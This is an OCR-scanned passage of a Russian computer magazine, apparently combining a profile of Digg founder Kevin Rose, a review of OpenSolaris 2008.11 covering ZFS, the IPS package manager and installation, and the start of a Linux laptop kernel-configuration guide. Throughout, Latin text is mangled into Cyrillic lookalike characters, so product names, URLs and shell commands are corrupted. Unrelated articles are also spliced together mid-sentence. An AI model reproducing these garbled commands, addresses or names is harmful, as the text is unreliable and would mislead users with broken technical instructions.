ренно, когда на горизонте замаячили серьезные перемены. Бизнес 
диктовал свои законы, и ТесЬТѴ с потрохами перекупила крупная 
компания СотсазТ задумав его слияние со своим геймерским каналом 
04. По большому счету, желания работников ТесЬТѴ на этот счет никто 
не спрашивал, а под предлогом слияния новое руководство уволило 250 
человеки заявило, что готово принять 80-1 00 сотрудников, нотолько в 
головном офисе компании — в Лос-Андежеле. На переезд и такиеусло- 
вия согласились немногие. В ходе этих пертурбаций отбылой команды 
ТесЬТѴ осталасьжалкая горстка — всего шесть человек. Кевин Роуз был 
в этой шестерке. 



РЕВОЛЮЦИЯ ЗА ПАРУ ТЫСЯЧ ДОЛЛАРОВІ 



Несмотря на то, что работуудалось сохранить, а к персоналу из «старой 
команды» на новом месте относились нормально, сторонние проекты и идеи 
затягивали Кевина всесильнее. Официально он, уже в качестве одного из 
постоянных ведущих, продолжал корпеть надТЬе Зсгееп Заѵегз, а «неофи- 
циально» потихоньку работал над своим ІбеЬгокеп и задумывался о боль- 
шем. Гораздо большем. Регулярнообщаясьссильными мира сего, сложно 
не мечтать о великих свершениях. А гостями студии ТЬе Зсгееп Заѵегз 
становились многие видные личности ІТ-сцены, включая таких маститых 
динозавров, какСтив Возняк. Кстати, именно он вдохновил молодого, пер- 
спеетивного парня Роуза на создание чего-то действительно новаторского. 
Согласно официальной легенде, Кевин и Стив имели шуточный разговор на 
темудалеких 70-х и революционных идей, рожденных вто время. В ходе об- 
суждения наш герой окончательно уверился, что нужно «что-то делать». Что 
и говорить, живой пример влице Возняка маячил перед глазами. Впоследс- 
твии, поразмыслив над темой немного конкретнее (формулировка «что-то 
делать» плохо подходитна роль бизнес-плана), Кевин, не иначе какв силу 
профессии и прямой связи с миром журналистики, решил, что неплохим 
полем деятельности может стать новостной веб-сайт. Ну, а дабы привнести 
некое новаторство — сайт должно было контролировать его же собственное 
пользовательское коммьюнити. 

Стояла осень 2004 года. Идея настолько захватила Роуза, что он принялся 
рьяно ее реализовывать, невзирая на практически полное отсутствие 
ресурсов. Имея на руках весьма скромную сумму, он нанял программиста- 
фрилансера за $1 2 в час с целью создания веб-страницы и приобрел за 
$1200 доменное имя сіідд.сопп . Интересно, что эти деньги должны были 
пойти в счетоплаты дома, где Кевин проживал вместе со своей девушкой, 
но захваченный азартом «творец» без колебаний пустил их надело. В ито- 
ге, со своей дамой сердца Роуз поссорился, и они расстались. Стех пор он 
не устает повторять: «что бы ни происходило с сіідд.сопп . я никогда больше 
не поставлю бизнес превыше всего». Но вернемся ксайту. Вообще-то, 
назватьего планировали «Оіддпабоп», но имя показалось Роузу чересчур 
длинным. В ходе сокращения сначала родился простой и запоминаю- 
щийся «Бід», нотаккакдомен щсот уже принадлежал корпорации 
ѴѴаК Оізпеу I піегпеі; Сгоир, пришлось добавить вторую «С». Исходное 
«Оіддпабоп», впрочем, тоже не пропалодаром — теперьтак называется 



официальный еженедельный подкастДигга, в котором рассказывается о 
наиболее интересных событиях на сайте. 

На разработку ушло всего ничего — сайт был готов кзапускууже кзиме 
2004. Кевинуудалосьзаинтересовать проектом друзей, так что команду 
стартапа составили Оуэн Бирн (Оѵѵеп Вугпе), Рон Городецкий (Роп 
Согобе^ку) и Джей Адельсон Рау Абеізоп). Все они, кроме Бирна, по сей 
день остаются «в строю». Рідд.сот официально открыли для посетите- 
лей 5 декабря 2004, не преминув отрекламировать запуск ресурса прямо 
в эфире Тбе Зсгееп Заѵегз, тем самым сразу обеспечив проекту первую 
(и далеко немаленькую) аудиторию. 

Что представлял собой первичный Бідд? Концепция не сильно отлича- 
лась оттого, что мы имеем сегодня — у Роуза и товарищей получилась 
экспериментальная помесь новостного агрегатора с сайтом социальных 
закладок, блогом, РЗЗ-лентой и социальной сетью. Более того, стека- 
ющиеся на Бідд со всего света ссылки не контролировались никакими 
«высшими инстанциями» — усайта не было и нет редакторов, а рейтинг 
новостей здесь определяют сами юзеры, голосуя за новость простым на- 
жатием на «-» или «+». Не было на Бідд и рекламы, правда, лишь первое 
время. Кактолько вокруг него сформировалось первичное коммьюнити 
(а благодаря грамотному рекламному ходу Роуза, это произошло быстро 
— порядка 100.000 человекон сайту обеспечил), на страницах сразу же 
появился блокСоодІе АсІЗепзе. С коммьюнити Бідд повезло. Дело в том, 
что еще до запуска было принято решение исходно сосредоточиться на 
технологической тематике и соответствующих новостях. И именно за 
счеттого, что ресурсом заинтересовалось огромное количество гиков (а 
кто еще мог составлять аудиторию ТЬе Зсгееп Заѵегз?), сіідд.сопп сумел 
быстро набрать внушительное количество входящих ссылок. Оказалось, 
что технари являются довольно активной группой — посещая множество 
блогов и сайтов, они были рады поделиться найденнойтам инфор- 
мацией и сделать в Сети рекламу за интересовавшему их начинанию. 
Плюс, поспособствовала раскрутке и функция «Віод Оэіз». С ее помощью 
любую новость с сіідд.сопп можно было легко осветитьу себя в блоге, дав 
на нееудобную ссылку. Совсем скоро Оідд начал мелькать на первых 
строчках крупнейших поисковиков. 



УСПЕХ ПО ВСЕМ ФРОНТАМ 



Экспериментудался. Стартап уверенно вставал на ноги, когда на 
основной работеу Роуза начались не слишком приятные перемены. Его 
родное шоу ТЬе Зсгееп Заѵегз решили упразднить, заменив похожей 
программой АиаскоіЧЬеЗЬоѵѵ!, с менее хардкорным уклоном. Дело в 
том, что С4хотели вернуть прежний облик геймерского и, скажем прямо, 
довольно попсового канала. В новую передачу взяли старых ведущих, 
такчто остаться неудел Кевину, в общем-то, не грозило, нотакое поло- 
жение вещей его решительно неустроило. Окрыленный вырисовыва- 
ющимися успехами Бідд, 22-го мая 2005 в своем блоге он сообщил, что 
разорвал контракте 04. 27-го числа Роуз в последний раз провел эфир 
Аиаск оіЧЬе ЗЬоѵѵ! и ушел в свободное плавание, чтобы уже в апреле 
2005 основать собственный интернет-телеканал. 




[Глядя на это, понимаешь — хорошо быть Кевином Роузом! ц 
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Рабочее место миллионера мало чем отличается от обычного 

снова привлекло к сайту внимание инвесторов, обеспечив вливание 
$28.7 млн. от фонда НідЫапсІ Саркаі Рагіпегз. Отсюда нетрудно сделать 
вывод, что Кевин, по состоянию на 2008 год, не бедствует, а стало быть 
— дела идутхорошо иудругихего предприятий. РеѵізіопЗ действитель- 
ноуверенно держится на плаву, снабжая нашего брата интересными 
видео-материалами, а новый стартап Роѵѵпсе, запущенный в начале 
2008 и представляющий собой социальную сеть с функцией микроблог- 
гинга, понемногу развивается. 

Что до Рідд’а, который заслуживает отдельного внимания, сайт уже прочно 
зарекомендовал себя какодно изтоповыхСМИ Сети — порядка 236 мил- 
лионов посетителей ежегодно и ведущие позиции среди мировыхлидеров 
по генерациитрафика. Однако нельзя забывать, что «топовый» в данном 
случае совсем не означает «достоверный» или «объективный», ведь 
новости поставляюти поднимают до главной страницы обычныелюди. 
Любая ошибка в новостях на сііаа.сопп — а они распространяются по Сети 
со скоростью лесного пожара — чревата не очень приятными конфузами, 
а информация зачастую носит сомнительный характер. Не слишком боль- 
шой любовью думающей публики пользуется и сама система рейтинга. В 
сообществе Оідд’а уже давно сложилась своего рода «мафия». Из-за нее 
ключевую рольиграетне ценность отправленной на сайтинформации, а 
количество друзей, готовых проголосоватьзатвойтопик, илиже количес- 
тво Іор-розіеп’ов (людей, чьи топики попадали на главную страницу] утебя 
во френдах. Получается, что принцип «голосуй за мои топики, я проголосую 
затвои»здесь в почете, а речь идет совсем нео ценности информации, а 
скорее, о«миллионелеммингов». 

Конечно, «читать или не читать» — это личное дело каждого. Но в 
оправдание сііаа.сопп отмечу, что на сайт попадаюттакие вещи, которые 
могут остаться за бортом серьезных новостных лент, и этим он интересен 
и уникален. Пожалуй, только здесь одинаково бурно могут обсуждать 
выборы президента США, взлом мобильника ПэрисХилтон и новую 
прошивку для іРЬопе. А с учетом того, что сайт легко настраивается «под 
себя», читать можно только о тех областях, которые тебе действительно 
небезразличны. 

Но последнее слово этой статьи все же хотелось бы посвятить Кевину 
Роузу, а не сііаа.сопп . Натекущий моментавтору одного изсамыхярких 
ѴѴеЬ 2.0 проектов исполнился всего 31 год, и он занятие одним люби- 
мым делом, а сразу несколькими. За годы вращения в телевизионных 
и компьютерных кругах Кевин нетолько набрался опыта, но и оброс 
полезными связями, подолгу работы и зову личных интересов общаясь 
со многими пионерами ІТ-среды. Набрать большие обороты и развить 
по-настоящему бурную деятельность ему удал ось л ишь недавно, и 
останавливаться на достигнутом Роуз определенно не собирается. 

Какие еще идеи могут показаться ему заслуживающими внимания, и не 
передумал ли он «что-то делать», мы узнаем в самом скором будущем. 
Достаточно просто следить за новостями, что в наше время стало совсем 
нетрудно. ИИ 



ВизіпеззѴѴеек, сильно преувеличивший доходы Кевина 

Проект получил имя РеѵізіопЗ Сопропабоп (МодификацияЗ). Придумы- 
вая название, Джей Адельсон, Роуз и Дэвид Праджер (ОаѵісІ Ргадег] 
взяли стандартноеТВ за нулевую точку отсчета. Единицей они назвали 
кабельноетелевидение, двойкой — видео для ПК... атретьим витком 
развития, по их мнению, стало интернет-телевидение, ориентированное 
на владельцев іРоб, ТіѴо и прочих мобильных девайсов. Согласно этой 
системе подсчета и решено было назвать фирму, деятельность которой 
целиком и полностью сфокусировалась на видео- и обычном подкас- 
тинге. РеѵізіопЗ приютила под своим крылом уже упомянутый бпебгокеп, 
подкаст Оідд’а — Оіддпабоп и многие другие шоу, ориентированные, в 
своей массе, на всетехже гиков. 

Параллельно с этим креп и развивался сііаа.сопп . Первые серьезные 
инвестиции пришли к нему уже в октябре 2005, — это были $2.8 млн. 
венчурного капитала от ведущих инвесторов. По сути, оста вал ось только 
осторожно направлять сайтв нужное русло, не мешая ему самостоя- 
тельно развиваться. Монетизация Оідд’а.тем временем, двигалась 
проверенным путем показа рекламы. У сайта былотакое количество 
хитов в сутки, что вскоре он не только окупил вложенные в него деньги, 
но и стал приносить прибыль. О многом говорит тот факт, что в 2006 году 
Кевин попал на обложку журнала ВизіпеззѴѴеек схарактерным заголов- 
ком: «Как этот парень сумел сделать $60 миллионов за 18 месяцев». Хотя 
Роуз позже опроверг информацию относительно 60 миллионов, кэтому 
моментуон влюбом случае заработал немало. Ноупомянутая сумматоже 
взялась не с потолка. Ее образовали путем нехитрых вычислений — в 
ВизіпеззѴѴеек просто прикинули, сколько могла стоить на рынке доля в 
30-40% компании, принадлежащая Кевину. 

На сегодня Оідд, конечно, стоит много дороже. Не далее чем летом этого 
года боодіе предлагал за него $200 млн. И хотя сделка не состоялась, это 
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|ют технологии проприетарного 5о1агІ5. После выхода свободной версии I 

|2Р5, РТгасе, контейнеры и многое другое^ 



Н О ПРОЕКТЕ 

Как несложно догадаться, ОрепЭоІагіз базируется на Эоіагіз — ком- 
мерческой операционной системе с закрытыми исходными кодами, 
разрабатываемой компанией 5ип Місгозузіетз. «Солярка» снискала 
себе популярность среди администраторов, разработчиков и просто 
любопытных, благодаря своей надежности, производительности, 
масштабируемости и управляемости. Однако первые версии стоили 
недешево. Версия Эоіагіз 9, вышедшая в 2002 году, стала бесплатно 
распространяться полицензииСООб, но без поддержки, документации 
и некоторого закрытого ПО (Ѵаіие АсИесІ Оо^ѵѵаге]. Летом 2005 года в 
5ип было принято решение об открытии части исходного кода системы 
(по СООІ_] и запуске проекта ОрепЭоІагіз ( ги.орепзоіагіз.огд ). в рамках 
которого усилиями сообщества должен разрабатываться свободный 
вариантЭоІагіз для платформ 5РАРС, х86 и РоѵѵегРС. 

Некоторое время ОрепЭоІагіз обозначал скорее проект, чем готовый 
дистрибутив. Дело пошло шустрее, когда летом 2007 5ип наняла 
основателя Ребіап Яна Мердока. И вот, почти год спустя, увидел свет 
ОрепЭоІагіз 2008.05, который сразу был хорошо принят пользовате- 
лями, даже несмотря на некоторую сырость. В дальнейшем команда 
разработчиков обязалась выпускать релизы каждые полгода, поэтому 
сегодня мы имеем уже ОрепЭоІагіз 2008.1 1 . 



В ОрепЭоІагіз изначально поддерживается несколько языков, среди ко- 
торых есть и русский. Система управления пакетами получила название 
ІР5 (Ітаде Раскадіпд Бузует) и очень напоминает АРТ из Ребіап, что, в 
общем-то, неудивительно, учитывая присутствие Мердока. Установка 
приложений, обновление пакетов и дистрибутива выглядиттакже прос- 
то, как и в Оебіап. Дистрибутив распространяется в виде ЫѵеСО с воз- 
можностью установки на жесткий диск, содержит базовую операцион- 
ную систему ОрепЭоІагіз и поддерживает все традиционные разработки 
и технологии, доступные вЭоІагіз. Это 128-битная файловая система 
2Р5 с функциями мгновенного отката и постоянной проверки контроль- 
ных сумм. Тут есть средство динамической трассировки задач РТгасе. 
Оно обеспечивает безопасный и полный контроль параметров дейст- 
вующих систем для ускорения создания приложений и оптимизации 
работы ОС. Есть и контейнеры, изолирующие программные приложения 
или службы с использованием гибких, программно-определяемых 
границ (например, если сбой происходит в процессе пользовательского 
уровня, граница контейнера воспрепятствует распространению отказа 
на другие контейнеры]. В настоящий момент для ОрепЭоІагіз реали- 
зованы многие компоненты и протоколы: ІРзес, КегЬегоз, 5А5І_, КМР, 
ОрепЭоІагіз Ѵігіиаі Мападег (хѴМ) и т.д. Правда, некоторые из проектов 
(полный список — ѵѵѵѵѵѵ.ореп5о[агІ5.огд/о5/рго]есі:5 ] пока еще находятся 
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на ранней стадии развития. При закачке образа следует 
быть внимательным, так как по умолчанию предлагается 
«облегченный» образ с ограниченной локализацией 
(только основные языки] и ускоренной установкой. В обра- 
зе, отмеченном буквой «д» (діобаі), используется Б2МА- 
компрессия. Это позволило добавить поддержку 1 2 языков 
рабочего стола. Кстати, диск можно получить по почте 
совершенно бесплатно. Для этого нужно выбрать на сайте 
проекта ссылку «бе! Ргее Мебіа» и заполнить форму. 
Посмотрим, что собой представляет единственная откры- 
тая версия ЭѴВ4. 

К ЗАГРУЖАЕМСЯ В ЫѴЕСО 

Особых системных требований к компьютеру на сайте 
проекта не приведено. ОрепЭоІагіз запускается на 32- и 
64-битных х86-системах, а также на виртуальных машинах 
ѴігІиаІВох и ѴМѴѴаге. Причем, в качестве виртуальной 
машины рекомендуется использовать именно ѴігІиаІВох 
(в начале 2008 года Іппоіек был приобретен Эип 
ОрепЭоІагіз под ее управлением работает более стабиль- 
но. Работа в ОрепЭоІагіз на компьютере с минимальными 
512 Мб ОЗУ не очень комфортна, поэтому памяти жела- 
тельно побольше. Для установки потребуется, минимум, 

3 Гб раздел (а лучше — 1 0 Гб]. Этот раздел должен быть 
расположен ДО Ыпих зѵѵар, если таковой имеется (у обоих 
одинаковые идентификаторы, и ОрепЭоІагіз начинает 
путаться]. 

ЫѵеСО загружается из меню ОРШ, в котором можно вы- 
брать ОрепЭоІагіз (графический режим или консоль] или 
загрузку с жесткого диска. Далее вводим цифры, соответс- 
твующие раскладке клавиатуры и языку рабочего стола 
(для русского это номера 29 и 10]. Через некоторое время 
перед нами предстанет рабочий стол ОІЧОМЕ (версии 
2.23.91 с композитным менеджером СотрЫ]. Увы, никакого 
статус бара или информации отом, что сейчас происхо- 
дит, не выводится. Учитывая большее, чем в Ыпих, время 
загрузки, это было бы очень кстати (поначалу создается 
впечатление, что все зависло]. 

Десктоп ОІЧОМЕ с четырьмя иконками (ЫѵеСО, Оеѵісе Огіѵег 
ІЛіІііу, «Начало работы в ОрепЭоІагіз» и «Установить Ореп 
Эоіагіз»], в общем-то, стандартен. Интерфейс ОІЧОМЕ и 
приложений локализован практически полностью. Редкие 
подписи на английском (вроде Оатез] общего впечатле- 
ния не портят. В этом вопросе, по сравнению с ОрепЭоІагіз 
2008.05, виден явный прогресс. Несколько непривычно для 



пользователей Ыі п их/ѴѴі псіоѵѵ5 функционирует переключа- 
тель клавиатуры: по комбинации <СігІ+пробел>. 
Послезагрузки в системе имеются двеучетныезаписидаскс 
паролем]аск и гооі с паролем орепзоіагіз. Чтобы выполнить 
задачус правами администратора, надо использовать«зи» 
для переключения на эту роль — или «ріехес» (замена зисіо], 
чтобы выполнить команду с нужными правами. Структура 
файловой системы напоминает Ыіпих (логично, таккакобе 
являются производными Эузіет V). Конечно, есть и свои 
особенности. Например, ОрепЭоІагіз отличается отЭузІет 
V режимами загрузки и для восстановления системы при- 
меняется «Э» (зіпдіе), управляемый скриптами в каталоге 
/еСс/гсЗ . сі. Все утилиты проекта ОІЧІЧ вынесены в каталог 
/изг/дгш. Сетевые интерфейсы, ведомые подсистемой 
ІЧѴѴАМ (ІЧеІѵѵогк Аиіо-Мадіс. орепзо1ап5.огд/оз/рго]ес1/ 
пѵѵат ]. настраиваются автоматически при помощи ОСНР. 
Настройки ІЧѴѴАМ находятся в файле /еСс /пѵѵат/ 11р. В 
моем случае он имел вид: 

$ саС /еСс/пѵѵат/ІІр 

еІОООдО сШср 

Вывод «іГсопГід -а» показал, что еІОООдО — это не что иное, 
как название сетевого интерфейса. Чтобы указать стати- 
ческий адрес, можно использовать тот же «ііісопіід», но 
почему-то этот вариантсрабатывает не всегда. Поэтому 
лучше изменить настройки ІЧѴѴАМ. Для этого достаточно 
отредактировать файл Ир при помощи редактора VI (есть и 
ОЕст): 

еІОООдО зСаСіс 192.168.1.160/24 
После чего перезапустить службу пѵѵат: 

# зѵсабт гезСагС пѵѵат 

Н ПОДДЕРЖКА ОБОРУДОВАНИЯ 

Хотя платформа х86 развивается для Эоіагіз довольно 
давно (с 1 994 года], список поддерживаемых устройств 
на порядок меньше, чем в Ыіпих. Некоторые компоненты 
в настоящее время усиленными темпами портируются из 
ІЧеіВЭО и других опера ционок (при условии, что лицензия 
это позволяет] — например, стек Віиеіооіб ( орепзоіагіз. 
огд/оз/ргоіесі/ЫиеІооіЬ ]. На начальном этапе находит- 
ся разработка АСРІ (ЭизрепсІ/Везите] и ОВІ. Многие 



• Сайт проекта 
ОрепЭоІагіз, откуда 
можно скачать сам 
дистрибутив и руко- 
водство по работе, 
находится по адресу 
ги.орепзоіагіз.огд . 

• Скачать бесплатную 
версию Эоіагіз 1 0 
можно по ссылке на 
стра н и це ѵѵѵѵѵѵ.зип. 
сот/зоЫѵѵаге/зоІагіз . 

• Бесплатный курс 
по ОрепЭоІагіз: ѵѵѵѵѵѵ. 
зип.сот/ігаіпіпд/ 
саІаІод/соигзез/ѴѴЭ- 
1 000-РЭ.хтІ. 
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В ОрепЗоІагіз есть приложения для большинства повседневныхзадачі 



производители оборудования предоставляют собственные драйвера, 
что-то написано энтузиастами. В результате ОрепЗоІагіз поставляет- 
ся с большим количеством драйверов для многих устройств. В меню 
«Приложения» даже присутствует программа настройки драйверов 
видеокарт Ыѵібіа — ІЧѵісІіа ХЗегѵегЗеШпд. 

Перед установкой дистрибутива следует воспользоваться программой 
Оеѵісе Огіѵег ІЛіІФу, ярлык для которой расположен на рабочем столе. 
Она поможет оценить поддержку оборудования в каждом конкретном 
случае и выдастсписок рекомендаций суказанием необходимых 
драйверов. Количество неподдерживаемого оборудования отражается 
в строке «Огіѵег РгоЫетз», а само проблемное оборудование под- 
свечивается красным цветом. В самом простом случае для установки 
драйвера достаточно нажать кнопку «Іпзіа II Огіѵегз». Чтобы помочь 
проекту в сборе данных, можно отправить информацию об оборудова- 
нии компьютера, нажав кнопку ЗиЬтіР 

Для поиска совместимого оборудования рекомендуется посетить 
ресурсы — Боіагіз 05: Нагсіѵѵаге СотраІіЬіШу І.І5І5 ( ѵѵѵѵѵѵ. зип. сот/ 

Ыдабтіп/бсі ). коллекцию драйверов для сетевых карт Ргее N10 сігіѵегз 

^огЗоІагіг ( Ьотераде2.піІТѵ.сопп/ппгѵппЗАаіѵос1о/епд ) и Ореп Зоипсі 
Зузіет ( орепвоипсІ.сопп/озБ.ЫппІ ). 

Среди проектов обрати внимание на Оеѵісе Мападег, предлагающий 
уже практически готовую реализацию менеджера устройств ( ѵѵѵѵѵѵ. 

орепзоІагіз.огд/оз/ргоіесіУсІеѵісеппдг ). 

В УСТАНОВКА 0РЕЫ50І_АКІ5 

ОрепЗоІагіз можно установить какединую систему или какчасть 
мультизагрузочной среды. Первый вариант самый простой, нотребует 
наличия отдельного компьютера/диска. Во втором нужно учитывать 
несколько особенностей. Так, программа установки ОрепЗоІагіз, 
вызываемая нажатием ссылки «Установить ОрепЗоІагіз», не имеет 
средств подготовки разделов диска и видиттолько первичные разделы 
жесткого диска. Расширенные разделы не отображаются, хотя пер- 
вичный раздел, в котором они находятся, виден. Программа установки 
позволяет использовать уже существующий раздел Зоіагіз или весь 
диск, поэтому в мультизагрузочной среде лучше подготовить нужный 
раздел заранее, используя специальные инструменты (например, диск 
БузІетРезсиеСй, ѵѵѵѵѵѵ.зѵзгезсссі.огд ). Система использования диска 
в ОрепЗоІагіз напоминает принятую в хВ50. В выбранном разделе 
создаются более мелкие подразделы — слайсы. В ходе установки будут 
выделены три слайса: загрузочный, корневой и своп. Просмотреть 
таблицу слайсов можно при помощи команды «Ьгтаі». В качестве 
корневой файловой системы устанавливается 2Р5. 

Для загрузки ОрепЗоІагіз используется адаптированный О Р И В ; ин- 
формация об установленной ѴѴі псіоѵѵз будет за несена в его конфигура- 
ционный файл автоматически. Если на компьютере установлен І_іпих, 



следует сохранить файл настройки загрузчика и перенести из него 
данные в теп и. Ізі ОрепЗоІагіз’а. 

Сам процессустановки системы, состоящий из семи шагов, не выгля- 
дит сложным и напоминает инсталлятор ІІЬипІи. В первом окне зна- 
комимся с информацией поустановке. Далее указываем раздел, куда 
будем ставить операционку. На следующем шаге при помощи карты 
| выбираем часовой пояс, вводим дату и время. На странице «Локаль» 
выбираем язык, который будет использоваться по умолчанию, этот 
выбор определит прочие системные параметры (формат даты, времени 
и т.д.]. В установленной системе можно сменить язык, закончив сеанс 
и выбрав нужный в окне «Регистрация». Затем набираем два раза 
пароль гооІ и заводим обычную учетную запись. Вход с правами адми- 
нистратора невозможен ни в ЫѵеСО-режиме, ни в установленной сис- 
теме (хотя такой вариант реализуем). Пользователь гооі: в ОрепЗоІагіз 
является ролью; первая созданная в системеучетная запись будет 
иметь возможность переключения на нее. 

Вот и все настройки. Теперь проверяем и при необходимости коррек- 
тируем их. Чтобы начать установку, нажми кнопку «Установить». По 
окончании процесса будет выведена заключительная информация. 

В ФАЙЛОВАЯ СИСТЕМА 2Р5 

Появление 2Р5 в 2004 году наделало много шума, и до сих пор эта файло- 
вая система является предметом горячих обсуждений. Поэтому 2Р5 — это 
еще один повод, ради которого многиеустанавливаютОрепЗоІагіз. Раз- 
рядность в 128 бит позволяетхранить просто огромные объемы инфор- 
мации (максимальный размер любого объекта 16 эксабайт — 2 Л 64 байт). 
Концепция виртуального пула хранения данных позволяетобойтись без 
системыуправлениятомами, вроде РѴМ,а РАЮ -2 даст фору обычному 
РАЮ. В пределах одного пула можно создавать 2 Л 64 файловых систем, и 
менять размер их по мере необходимости. Но это еще не все. Фрагмента- 
ция данных отсутствует. Пользователь может самостоятельно выбирать 
размер блоков данных вплотьдо 128 Кб; возможно использование 
компрессии данных [І.І№ или 02ір); предусмотрен контроль целостности 
информации; поддерживаются режимы клонирования и зеркалирова- 
ния. Крометого, в 2Р5 встроена функция создания снапшотов — момен- 
тальныхснимков состояния файловой системы на определенный момент 
времени, в которых сохраняется информация об измененных блоках. 
Сейчас 2Р5 портируется в РгееВЗО, Мае 05Х, Ыпих. Из-за несовмести- 
мости лицензий поддержка I Р5 не может быть включена в ядро Ыпих, 
поэтому адаптация ведется с использованием РУЗЕ. 

Управление элементами 2Р5 производится при помощи утилитхрооі 
и 2 Із. Первая предназначена для управления пулами, вторая — фай- 
ловыми системами. Например, создадим зеркальный пул из двух 
запоминающих устройств: 

# грооі сгеаСе шугбз тіггог сІсШ с2сЮ 

Теперь информацию о зеркале можно просмотреть командой «грооі 
Іізі» или «грооі зІаШз -ѵ». Устройства можно вводить в пул, отключать, 
заменять, экспортировать в другую систему и многое другое. Полный 
список ко манд ты найдешь на странице проекта в документации по 2Р5 

( ѵѵѵѵѵѵ. орепзоІагіз.огд/оз/соттипЦу/Аз/сІосз ). 

В итоге, несмотря на десктопную направленность ОрепЗоІагіз, наличие 
2Р5 — хороший повод посмотреть на нее под другим углом: как на 
систему для хранения данных. 
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г ПАКЕТНАЯ СИСТЕМА ІРБ 

Приложений, идущих в поставке, хватает для выполне- 
ния большинства стандартных задач. В меню находим: 
ЕігеЬх, ТЬипсІегЬігсІ, ЕѵоІіЛіоп, Рісідіп, Екіда, Тоііет , 
ВЬуіЬтЬох, ОІМР, Оідікат и другие. Остальное доуста- 
навливаем при помощи системы управления пакетами 
ІР5. Одной из особенностей этого пакетного менеджера 
является тесная связь с 2Е5 и использование некото- 
рых ее возможностей: создание мгновенных снимков и 
копий файловых систем. Это позволяет при неудачном 
обновлении пакетов выполнить откат без переустановки 
системы или отдельного пакета, а также создавать не- 
сколько загрузочных окружений (Ьооі епѵігоптепі: — ВЕ), 
которые могут быть использованы для тестирования 
новых версий ОС. 

Все действия в ІР5 производятся при помощи ко- 
манды «ркд». Достаточно ввести « р к д іпзіаіі назва- 
ние», — и выбранный пакет будет установлен. Для 
обновления всех установленных пакетов текущего 
образа до последней доступной версии выполни 
команду: 

# ркд ітаде-ирсіаке 

Система поддерживает нетолько родные пакеты, но и 
солярисовские 5ѴР4. Официальный репозитарий ркд. 
орепзоіагіз огд насчитывает более 17000 пакетов. По мере 
роста популярности дистрибутива ожидается появле- 
ние других репозитариев. Проекты зипігееѵѵаге.сот 
и Ы-азіѵѵаѵе.ога уже открыли собственные хранилища 



$ ркехес ркд зек-аиккюгіку -О Ъ.ккр:// 
Ыазкмаѵе . пекѵгогк. сот: 10000/ Віазкѵ/аѵе 

Азатем накати пакеты тріауег, дзіріидіпз, дзіріидіпздоосі, 
дзіріидіпзбасі, дзіріидіпзидіу. Для установки удобнее 
использовать графический «Диспетчер пакетов». Сделан 
он потипу ЭупарОс, но функционально до него пока еще не 
дотягивает. 

Из-за специфики ІР5 некоторые команды ркд выглядят не 
такпросто, какв ОеЬіап. Например, для просмотра инфор- 
мации о пакете следует ввести: 

# ркд сопкепкз -к сііг , кііе , Ііпк, кагсіііпк 
-о аск іоп. пате , тосіе, ркд. зІ 2 е,ракк., кагдек 
ЗШМгкз 

В итоге получим информацию, что куда и какустанавли- 
вается, включая права доступа и прочее. К используе- 
мым в ІР5 терминам придется привыкать. Под «образом» 
понимается место, куда устанавливается пакет, обычно 
это рабочая ОС. Каждый пакет характеризуется кол- 
лекцией объектов (файлы, каталоги, зависимости], где 
отдельный элемент называется «действием» (аскіо п] . Как 
и АРТ, ІР5 позволяет самому легко создавать пакеты и 
репозитарии. И-И 




> ІП^О 

• Ситуация в 
ОрепЗоІагіз напоми- 
нает ВебНаДЕесІога. 
Все новинки, соз- 
даваемые в рамках 
проекта, после 
тщательного тестиро- 
вания могут попасть в 
Зоіагіз. 

• Приятная мелочь: 
вставленная флешка 
подхватилась на лету. 

• В качестве альтер- 
нативного десктоп 
окружения обеспе- 
чена поддержка КЭЕ 

4.1. 
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■ Подключение дополнительного монитора — ОК 

■ ЕхргеБзСагсІ — ОК 

И 2 3(5ТР, «Сизрепб Іо ПАМ», режим засыпания — сохранениетекущего 
состояния работы в оперативной памяти] — ОК 

Н 5 4(5Т0, «Сизрепб Іо бізк», режим засыпания — сохранениетекущего 
состояния работы на жестком диске] — ОК 

Нозв-ок 

Н1Е05-0К 

Д Дополнительная батарея — ОК 

Через два дня после покупки удалось добиться соответствия этому списку 
на 90%. А в конечном итоге — на 100%. Крометого.за полгода пришлось 
претерпеть множество изменений (2.6.23 -> 2.6.27]; в ядро постоянно 
добавлялись новые иудалялисьстарыедрайверы, а именно: 

Щ Начиная с ветки 2.6.24, присутствует подсистема іѵѵіѵѵій 
( іпіеіііпихѵѵігеіезз.огд ] — «рабочая лошадка» для ѴѴі-Рі. 

^Начиная с ветки 2.6.25, присутствует поддержка ІІѴС ( Ііпих-иѵс.Ьегііоз. 
бе], что позволяет использовать встроенную ѵѵеЬ-камеру. 

^Некоторые изменения в АСРІ, драйвере зку2 (ЕіЬегпеі) и Іпіеі НОА(НО 
Аибіо]. 

Также в новой ветке 2.6.28 уже включена поддержка СЕМ (ОгарЫсз 
Ехесиііоп Мападег] — новой системы управления памятью, разработан- 
ной компанией ІпЕеІ. Она работает на уровне ядра Ыпихи предназначена 
для низкоуровневого взаимодействия с графическим процессором. Для 
119200 — это І9650М (ОМАХЗЮО). Примечательно, что обладатели карточек 
I пііеі за счетСЕМ получатповышение производительности на 50-60% (так 
показывают тесты]. Полный списокоборудования можно просмотреть 
программами «Ізрсі» и «ІзизЬ» из рсіиіііз и избиіііз, соответственно. 

Н РАЗБЕРЕМСЯ В ЦНС 

Стоп! Прежде, чем разбираться, нужно знать«как». Ты должен уметь 
собирать ядро и настраивать в соответствии с ним загрузчик. Рассмат- 
ривать будем последнюю на момент написания статьи ветку ядра Ыпих 
(2.6.27]. Я — яростный приверженец минимализма и рекомендую выносить 
из ядра все лишнее, чтобы уменьшить его размер и хоть чуточку снизить 
время компиляции: например, если в списке десятки драйверов аудио- 
карт, зачем держать их все, да тем более в ноутбуке, когда знаешь, что тебе 
конкретно нужно? 

Н РАЗБЕРЕМСЯ В ЦНС! (ПОПЫТКА №2) 

Набираем «таке теписопЯд» (если в твоем дистрибутиве нет механиз- 
мов для конфигурации и установки ядра) и поехали. 

ДВыбираемтип процессора: Ргосеззогіуреапб Іеаіигез-^ (Ргосеззог 
Іатііу Соге2/пеѵѵегХеоп; Махітит питЬегоІСРІбз 2; МТРР); 

Щ Включаем возможности «засыпания» и еѵепі-интерфейс для работы с 
асріб: Роѵѵегтападетепіорііопз -> (Сизрепб Іо РАМ; НіЬегпаІіоп; АСРІ 
-> Оергесаіеб/ргос/асрі/еѵепі зиррогі; СРІб Егедиепсузсаііпд -> АСРІ 
РгосеззогР-5іаІез бгіѵег]; 

ДРСІ Ноіріид требуется для подключения ЕхргеззСагб: Визорііопз-^ (РСІ 
